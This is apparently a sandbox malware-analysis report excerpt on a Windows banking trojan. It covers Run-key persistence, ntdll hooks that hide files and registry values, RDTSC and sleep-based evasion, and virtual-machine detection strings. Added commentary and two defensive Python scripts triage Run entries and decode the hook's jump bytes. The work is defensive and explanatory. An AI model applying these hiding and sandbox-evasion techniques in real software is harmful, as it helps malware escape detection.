            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe | Code function: 12_2_02240C1A push edi; ret 12_2_02240C56
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe | Code function: 12_2_02241A92 push esi; ret 12_2_02241A94
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe | Code function: 12_2_02241B61 push esi; ret 12_2_02241B63
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe | Code function: 12_2_02240B89 push edi; ret 12_2_02240C56
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 17_2_00AB0BF6 push edi; ret 17_2_00AB0C32
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 17_2_00AB0B65 push edi; ret 17_2_00AB0C32
            Source: C:\Windows\System32\smartscreen.exe | Code function: 18_2_00290B65 push edi; ret 18_2_00290C32
            Source: initial sample | Static PE information: section name: UPX0
            Source: initial sample | Static PE information: section name: UPX1
            Source: initial sample | Static PE information: section name: UPX0
            Source: initial sample | Static PE information: section name: UPX1
            Source: C:\Windows\SysWOW64\winver.exe | File created: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe

            Boot Survival

            Source: C:\Windows\SysWOW64\winver.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run E38A1E29 (3 occurrences)
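What a defender should take from the Boot Survival finding is the shape of the entry, not just the one name: the Run value is a bare 8-hex-digit ID (E38A1E29, the same ID the report shows for the mutex, the drop directory under AppData\Roaming and the AppContainer path), and it is written by a hijacked winver.exe rather than by the sample itself. The Python below is an added example, not part of the report or of Joe Sandbox; it parses a constructed `reg export`-style text of the HKCU Run key and flags entries of that shape. The report does not show the value's data, so the bin.exe path in the sample is assumed from the dropped-file line; the OneDrive and Updater entries are benign filler.

```python
"""Triage HKCU Run entries for the autostart pattern the report shows.

Added example, not part of the Joe Sandbox report or its tooling. It parses
`reg export`-style text offline; on a live host you would feed it the file
produced by
    reg export "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" run.reg
(decoded from UTF-16 first, which is what reg.exe writes by default).
"""
import re

# Constructed sample. The report only shows the value *name* E38A1E29; the
# bin.exe path is assumed from the dropped-file line. The other two entries
# are benign filler so the filter has something to leave alone.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"E38A1E29"="\"C:\\Users\\user\\AppData\\Roaming\\E38A1E29\\bin.exe\""
"Updater"="C:\\Program Files\\Vendor\\updater.exe"
'''

HEX8_NAME = re.compile(r"^[0-9A-F]{8}$", re.I)
HEX8_APPDATA_DIR = re.compile(r"\\AppData\\(?:Roaming|Local)\\[0-9A-F]{8}\\", re.I)
# "name"="data" with .reg escaping (backslash doubles, quote is backslash-quote)
REG_VALUE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"\s*$')


def unescape(s: str) -> str:
    """Undo .reg string escaping (doubled backslash, backslash-quote)."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_run_values(reg_text: str) -> dict:
    """Return {value name: data} for every Run/RunOnce key in the export."""
    values, in_run = {}, False
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            key = line.lower()
            in_run = key.endswith(r"\run]") or key.endswith(r"\runonce]")
            continue
        m = REG_VALUE.match(line) if in_run else None
        if m:
            values[unescape(m.group(1))] = unescape(m.group(2))
    return values


def triage_run_values(values: dict) -> list:
    """Return [(name, data, [reasons])] for entries matching the report's pattern."""
    findings = []
    for name, data in values.items():
        reasons = []
        if HEX8_NAME.match(name):
            reasons.append("value name is a bare 8-hex-digit ID")
        if HEX8_APPDATA_DIR.search(data):
            reasons.append("target lives in an 8-hex-digit AppData directory")
        if reasons:
            findings.append((name, data, reasons))
    return findings


if __name__ == "__main__":
    for name, data, reasons in triage_run_values(parse_run_values(SAMPLE_REG)):
        print(f"{name}: {data}\n  " + "\n  ".join(reasons))
```

Either indicator alone is weak (some legitimate installers also use hex-looking GUID fragments), so the script reports the reasons rather than a verdict; both firing together, as they do for E38A1E29, is the pattern worth an immediate look at the referenced file and its parent process.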

            Hooking and other Techniques for Hiding and Protection

            Source: explorer.exe | IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
            Source: explorer.exe | IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
            Source: explorer.exe | User mode code has changed: module: ntdll.dll function: ZwResumeThread new code: 0xE9 0x9E 0xE1 0x12 0x25 0x51
            Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX (32 occurrences)
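The hook findings above are the user-mode rootkit half of the banker: the NtQueryDirectoryFile and ZwEnumerateValueKey hooks hide the drop directory and the Run value from explorer.exe, and the ZwResumeThread patch lets it inject into every new process before its first instruction runs. The "new code" bytes for ZwResumeThread are readable by hand: 0xE9 is a five-byte jmp rel32, the next four bytes are its little-endian signed displacement, and the sixth byte is simply whatever follows the jmp. Resolving where such a jump lands and whether the target is inside any loaded module is the first step in attributing a hook. The Python below is an added example, not from the report or Joe Sandbox; it decodes the patched prolog bytes the report gives, while the function address and ntdll image range it uses are hypothetical (the report does not state them) and the push/ret sample is constructed.

```python
"""Decode the control transfer a user-mode hook wrote over a function prolog.

Added example, not from the Joe Sandbox report or its tooling. PATCHED_PROLOG
is the byte sequence the report gives for ntdll!ZwResumeThread in explorer.exe;
the function address and ntdll image range used below are hypothetical (the
report does not state them) and the push/ret sample is constructed.
"""
import struct
from typing import Optional, Tuple

# From the report: "new code: 0xE9 0x9E 0xE1 0x12 0x25 0x51".
# Only the first five bytes form the jmp; the sixth is whatever follows it.
PATCHED_PROLOG = bytes([0xE9, 0x9E, 0xE1, 0x12, 0x25, 0x51])

# Hypothetical: where ZwResumeThread lives and the extent of ntdll's image.
FUNC_VA = 0x77A50000
NTDLL_RANGE = (0x77A50000, 0x77BF0000)


def decode_jump(prolog: bytes, func_va: int, bits: int = 32) -> Optional[Tuple[str, int]]:
    """Return (kind, absolute target) if the prolog begins with a control transfer.

    Patterns handled, all common for inline hooks on x86:
      E9 rel32          jmp rel32        5 bytes, target = next_ip + rel32
      EB rel8           jmp rel8         2 bytes, target = next_ip + rel8
      68 imm32 C3       push imm32; ret  6 bytes, absolute target (32-bit only)
    Displacements are signed and counted from the end of the jmp; the result
    is wrapped to the address width so a negative displacement behaves as on
    the CPU.
    """
    mask = (1 << bits) - 1
    if len(prolog) >= 5 and prolog[0] == 0xE9:
        rel32 = struct.unpack_from("<i", prolog, 1)[0]
        return "jmp rel32", (func_va + 5 + rel32) & mask
    if len(prolog) >= 2 and prolog[0] == 0xEB:
        rel8 = struct.unpack_from("<b", prolog, 1)[0]
        return "jmp rel8", (func_va + 2 + rel8) & mask
    if bits == 32 and len(prolog) >= 6 and prolog[0] == 0x68 and prolog[5] == 0xC3:
        return "push/ret", struct.unpack_from("<I", prolog, 1)[0]
    return None


def classify_hook(prolog: bytes, func_va: int, module_range: Tuple[int, int], bits: int = 32) -> str:
    """Say whether the prolog transfers control out of its own module."""
    decoded = decode_jump(prolog, func_va, bits)
    if decoded is None:
        return "no control transfer at the prolog"
    kind, target = decoded
    lo, hi = module_range
    where = "inside" if lo <= target < hi else "outside"
    return f"{kind} to {target:#x} ({where} the module image)"


if __name__ == "__main__":
    print(classify_hook(PATCHED_PROLOG, FUNC_VA, NTDLL_RANGE))
```

On a real dump, take the function address from the module's export table and the module range from the PEB loader list, then compare the resolved target with every loaded image; a target in a private committed region, like the 0x0139xxxx and 0x0345xxxx regions the report lists for explorer.exe, is the injected hook handler. A prolog that is a jmp but stays inside the same module is usually a legitimate forwarder, which is why the output reports the location rather than a verdict.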

            Malware Analysis System Evasion

            Source: C:\Windows\SysWOW64\winver.exe | RDTSC instruction interceptor: First address: 00000000047E2FAD second address: 00000000047E2FD6 instructions:
                0x00000000 rdtsc
                0x00000002 mov eax, edx
                0x00000004 stosd
                0x00000005 mov eax, dword ptr [ebx+004042B5h]
                0x0000000b stosd
                0x0000000c mov eax, dword ptr [ebx+004042B9h]
                0x00000012 stosd
                0x00000013 mov eax, dword ptr [ebx+00406820h]
                0x00000019 stosd
                0x0000001a mov eax, dword ptr [ebx+00406824h]
                0x00000020 stosd
                0x00000021 lea eax, dword ptr [ebp-00000700h]
                0x00000027 sub edi, eax
                0x00000029 rdtsc
            Source: C:\Users\user\Desktop\java.exe | Code function: 0_2_02220005 rdtsc
            Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 636
            Source: C:\Windows\SysWOW64\winver.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_2-3045
            Source: C:\Windows\SysWOW64\winver.exe TID: 6380 | Thread sleep count: 33 > 30
            Source: C:\Windows\SysWOW64\winver.exe TID: 6380 | Thread sleep time: -33000s >= -30000s
            Source: C:\Windows\SysWOW64\winver.exe TID: 6572 | Thread sleep count: 57 > 30
            Source: C:\Windows\SysWOW64\winver.exe TID: 6380 | Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\winver.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\winver.exe | Last function: Thread delayed
            Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
            Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
            Source: C:\Windows\System32\ctfmon.exe | Last function: Thread delayed
            Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | Last function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exe | Last function: Thread delayed
            Source: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exe | Last function: Thread delayed
            Source: C:\Windows\System32\smartscreen.exe | Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe | Last function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exe | Last function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exe | Last function: Thread delayed
            Source: C:\Windows\System32\ApplicationFrameHost.exe | Last function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exe | Last function: Thread delayed
            Source: C:\Windows\System32\oobe\UserOOBEBroker.exe | Last function: Thread delayed
            Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Windows\System32\dllhost.exe | Last function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exe | Last function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exe | Last function: Thread delayed
            Source: SearchApp.exe, 0000000B.00000000.1825708254.0000024340FB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dx0ma3d6fxrucbibtqempqemuae&or=w
            Source: SearchApp.exe, 0000000B.00000003.1889783869.0000024B42245000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \Moneysoft\Pay*|vmware workstation 12 player*|vmpl5459
            Source: SearchApp.exe, 0000000B.00000000.1845079625.0000024B43440000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: hyper-v
            Source: SearchApp.exe, 0000000B.00000003.1889783869.0000024B42245000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: C:\E20-II\H*|vmware horizon client*|vdi38940FB-4BFC-874A*|voice recorder*|voice recording8034ocExplor*|watchtower research*|wtr1433874A-C0F2E0B9FA*|web intelligence rich client*|webi1405.exe*|vmware vsphere client*|vcenter5038200E}\Mic*|vmware horizon client*|vm ware8394C:\E20-II*|vpn access manager*|shrew3128tware.DebutVid*|whatsapp desktop*|whatsp9331t12535
            Source: SearchApp.exe, 0000000B.00000003.1889783869.0000024B42245000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: TOSHIBA*|win-pak user interface*|winpak1154C14E77-02*|vmware horizon client*|view5503exe12536
            Source: svchost.exe, 00000005.00000000.1792111945.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;I!
            Source: explorer.exe, 00000003.00000000.1715884676.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3084368988.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1715884676.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3084368988.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.1795027301.0000019E29F00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3016216647.0000019E29F00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: SearchApp.exe, 0000000B.00000000.1882162991.0000024B54FD2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: s://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
            Source: explorer.exe, 00000003.00000000.1716420697.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
            Source: SearchApp.exe, 0000000B.00000000.1845079625.0000024B43440000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: hyper-vOs and f
            Source: explorer.exe, 00000003.00000002.3050739275.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
            Source: SearchApp.exe, 0000000B.00000003.1889409291.0000024B42223000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: *|vmware horizon client*|vm ware8394
            Source: explorer.exe, 00000003.00000000.1716420697.0000000009977000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00
            Source: explorer.exe, 00000003.00000000.1713964202.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NXTTAVMWare
            Source: explorer.exe, 00000003.00000000.1715884676.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
            Source: SearchApp.exe, 0000000B.00000000.1845305822.0000024B4402B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: ?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
            Source: SearchApp.exe, 0000000B.00000003.1889783869.0000024B42245000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: .exe*|vmware vsphere client*|vcenter5038
            Source: SearchApp.exe, 0000000B.00000003.1889783869.0000024B42245000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: {7C5A40EF-A0*|vmware vsphere client*|vspe6388axis Merge v*|voice recorder*|recording5394-4BFC-874A-C0F*|whatsapp desktop*|whatsup8240ulzbot.exe125*|wacom tablet properties*|intuos6552}\MEGA L*|watchtower media suite*|wms1er.exe12532
            Source: SearchApp.exe, 0000000B.00000003.1889783869.0000024B42245000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: {7*|vmware workstation 15 player*|vmplayer6438a*|whatsapp desktop*|whatapp7624{6D809377-6AF0*|whatsapp desktop*|whatss9497oogle Web Desig*|windows defender*|antivirus6866TerminalBrid*|visual studio code - insiders*|vscode3094re*|whatsapp desktop*|whats app6940p12539
            Source: explorer.exe, 00000003.00000002.3050739275.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1713964202.0000000007A34000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWen-GBnx
            Source: SearchApp.exe, 0000000B.00000003.1889409291.0000024B42223000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: *|vmware workstation 12 player*|vmpl5459
            Source: SearchApp.exe, 0000000B.00000003.1889409291.0000024B42223000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: *|hyper-v manager*|vm4595
            Source: explorer.exe, 00000003.00000002.3084368988.0000000009660000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
            Source: SearchApp.exe, 0000000B.00000003.1889409291.0000024B42223000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: *|vmware horizon client*|vmare7220
            Source: RuntimeBroker.exe, 00000011.00000000.1948613471.000001D175C80000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000003.00000002.3093722755.00000000098A8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: SearchApp.exe, 0000000B.00000003.1889409291.0000024B42223000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: *|vmware workstation 15 player*|vmplayer6438
            Source: explorer.exe, 00000003.00000002.2977124293.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
            Source: SearchApp.exe, 0000000B.00000003.1889783869.0000024B42245000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: C14E77-02*|vmware horizon client*|view5503
            Source: SearchApp.exe, 0000000B.00000003.1889783869.0000024B42245000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: *|mstsc164340E*|virtual account numbers*|citi515tars.NET\Po*|visual studio code*|vscode4061mes\S4League\*|visual studio 2013*|devenv63460000000000000*|visual studio code*|visy9233teHome_1\BIN\rw*|virtual machine manager console*|vmm4890F2E*|visual studio code*|vius9283EXCEL.EXE12531*|unified agent desktop client*|uad569isual P*|windows 7 usb dvd download tool*|win 742196*|windows defender*|windos71090E}\Minitab\Min*|vmware horizon client*|vmare7220444B-8957-A*|wacom preferences*|bamboo36521
            Source: SearchApp.exe, 0000000B.00000003.1889783869.0000024B42245000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: {7*|vmware workstation 15 player*|vmplayer6438
            Source: SearchApp.exe, 0000000B.00000003.1889783869.0000024B42245000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: C:\E20-II\H*|vmware horizon client*|vdi3894
            Source: SearchApp.exe, 0000000B.00000000.1820370567.0000024339C3F000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1826418071.00000243411CA000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
            Source: SearchApp.exe, 0000000B.00000003.1889783869.0000024B42245000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: {7C5*|whatsapp desktop*|watsapp9387\Moneysoft\Pay*|vmware workstation 12 player*|vmpl5459BFC-8*|windows defender*|widows7869Print CD\PrintC*|windows defender*|window defender6856B28FC2*|watchtower translation system*|wts244.AppRa*|windows explorer*|file:wux:file941tnyxGame\*|windows fax and scan*|scanb8973C5A40EF-A0FB*|windows fax and scan*|scan to computer8128l*|windows fax and scan*|scabn9201B-8957-A3773*|windows fax and scan*|sscan850464.exe12540*|windows live mail*|email:wux:email3973way S*|windows defender*|virus:wux:virus6030stmanC*|windows fax and scan*|scan and fax89874B-89*|windows fax and scan*|scana9910 Poker.exe1*|windows media player*|windows meda8882\Nuts*|windows media player*|windowsmedia9200-874A*|windows fax and scan*|hp scanner7923megaded*|windows fax and scan*|scanned767694012542
            Source: svchost.exe, 00000005.00000000.1792111945.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;nlse]
            Source: SearchApp.exe, 0000000B.00000003.1889783869.0000024B42245000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: {7C5A40EF-A0*|vmware vsphere client*|vspe6388
            Source: SearchApp.exe, 0000000B.00000003.1889409291.0000024B42223000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: *|hyper-v manager*|hyperv4178
            Source: SearchApp.exe, 0000000B.00000000.1825708254.0000024340FB1000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=wQ%
            Source: SearchApp.exe, 0000000B.00000003.1889409291.0000024B42223000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000003.1889880818.0000024B5CB61000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: *|hyper-v manager*|virtual5441
            Source: SearchApp.exe, 0000000B.00000003.1899996863.0000024B5CB40000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware.View.Client12451
            Source: winver.exe, 00000002.00000002.2975713129.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1792087388.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2993202471.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: explorer.exe, 00000003.00000000.1715884676.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NECVMWar VMware SATA CD00\w
            Source: explorer.exe, 00000003.00000000.1715884676.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
            Source: explorer.exe, 00000003.00000002.3093722755.00000000098A8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: SearchApp.exe, 0000000B.00000003.1889783869.0000024B42245000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: 200E}\Mic*|vmware horizon client*|vm ware8394
            Source: SearchApp.exe, 0000000B.00000003.1889409291.0000024B42223000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: *|vmware vsphere client*|vspe6388
            Source: SearchApp.exe, 0000000B.00000003.1889409291.0000024B42223000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: *|vmware horizon client*|vdi3894
            Source: SearchApp.exe, 0000000B.00000003.1889409291.0000024B42223000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000003.1889880818.0000024B5CB61000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: *|hyper-v manager*|hyper v4919
            Source: SearchApp.exe, 0000000B.00000003.1889783869.0000024B42245000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\VMware vCenter Converter Standalone\converter.exe12207
            Source: SearchApp.exe, 0000000B.00000003.1889409291.0000024B42223000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: *|vmware horizon client*|view5503
            Source: svchost.exe, 00000005.00000000.1792111945.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;
            Source: SearchApp.exe, 0000000B.00000003.1889783869.0000024B42245000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: 0E}\Minitab\Min*|vmware horizon client*|vmare7220
            Source: SearchApp.exe, 0000000B.00000000.1888021587.0000024B55466000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: lyncvmwareonenoteneroXK
            Source: SearchApp.exe, 0000000B.00000003.1889409291.0000024B42223000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: *|vmware vsphere client*|vcenter5038
            Source: explorer.exe, 00000003.00000002.2977124293.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
            Source: C:\Users\user\Desktop\java.exe | API call chain: ExitProcess graph end node | graph_0-3090
            Source: C:\Windows\SysWOW64\winver.exe | API call chain: ExitProcess graph end node | graph_2-2669
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe | API call chain: ExitProcess graph end node | graph_12-5897
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe | API call chain: ExitProcess graph end node | graph_12-5411
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe | API call chain: ExitProcess graph end node | graph_12-5583
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe | API call chain: ExitProcess graph end node
            Source: C:\Windows\SysWOW64\winver.exe | Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\java.exe | Code function: 0_2_02220005 rdtsc | 0_2_02220005
            Source: C:\Users\user\Desktop\java.exe | Code function: 0_2_00401000 mov eax, dword ptr fs:[00000030h] | 0_2_00401000
            Source: C:\Users\user\Desktop\java.exe | Code function: 0_2_02220C63 mov eax, dword ptr fs:[00000030h] | 0_2_02220C63
            Source: C:\Windows\SysWOW64\winver.exe | Code function: 2_2_047E0C3F mov eax, dword ptr fs:[00000030h] | 2_2_047E0C3F
            Source: C:\Windows\explorer.exe | Code function: 3_2_01390C3F mov eax, dword ptr fs:[00000030h] | 3_2_01390C3F
            Source: C:\Windows\explorer.exe | Code function: 3_2_03450C3F mov eax, dword ptr fs:[00000030h] | 3_2_03450C3F
            Source: C:\Windows\System32\sihost.exe | Code function: 4_2_00AC0C3F mov eax, dword ptr fs:[00000030h] | 4_2_00AC0C3F
            Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00910C3F mov eax, dword ptr fs:[00000030h] | 5_2_00910C3F
            Source: C:\Windows\System32\svchost.exe | Code function: 6_2_009A0C3F mov eax, dword ptr fs:[00000030h] | 6_2_009A0C3F
            Source: C:\Windows\System32\ctfmon.exe | Code function: 7_2_00A50C3F mov eax, dword ptr fs:[00000030h] | 7_2_00A50C3F
            Source: C:\Windows\System32\svchost.exe | Code function: 8_2_00D40C3F mov eax, dword ptr fs:[00000030h] | 8_2_00D40C3F
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | Code function: 9_2_00B50C3F mov eax, dword ptr fs:[00000030h] | 9_2_00B50C3F
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 10_2_00110C3F mov eax, dword ptr fs:[00000030h] | 10_2_00110C3F
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe | Code function: 12_2_001C0C3F mov eax, dword ptr fs:[00000030h] | 12_2_001C0C3F
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe | Code function: 12_2_02240C63 mov eax, dword ptr fs:[00000030h] | 12_2_02240C63
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 17_2_00AB0C3F mov eax, dword ptr fs:[00000030h] | 17_2_00AB0C3F
            Source: C:\Windows\System32\smartscreen.exe | Code function: 18_2_00290C3F mov eax, dword ptr fs:[00000030h] | 18_2_00290C3F
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe | Code function: 19_2_001C0C3F mov eax, dword ptr fs:[00000030h] | 19_2_001C0C3F
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe | Code function: 19_2_02410C63 mov eax, dword ptr fs:[00000030h] | 19_2_02410C63
            Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe | Code function: 21_2_00580C3F mov eax, dword ptr fs:[00000030h] | 21_2_00580C3F
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 22_2_003D0C3F mov eax, dword ptr fs:[00000030h] | 22_2_003D0C3F
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 23_2_00900C3F mov eax, dword ptr fs:[00000030h] | 23_2_00900C3F
            Source: C:\Windows\System32\ApplicationFrameHost.exe | Code function: 24_2_00180C3F mov eax, dword ptr fs:[00000030h] | 24_2_00180C3F
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 26_2_00190C3F mov eax, dword ptr fs:[00000030h] | 26_2_00190C3F
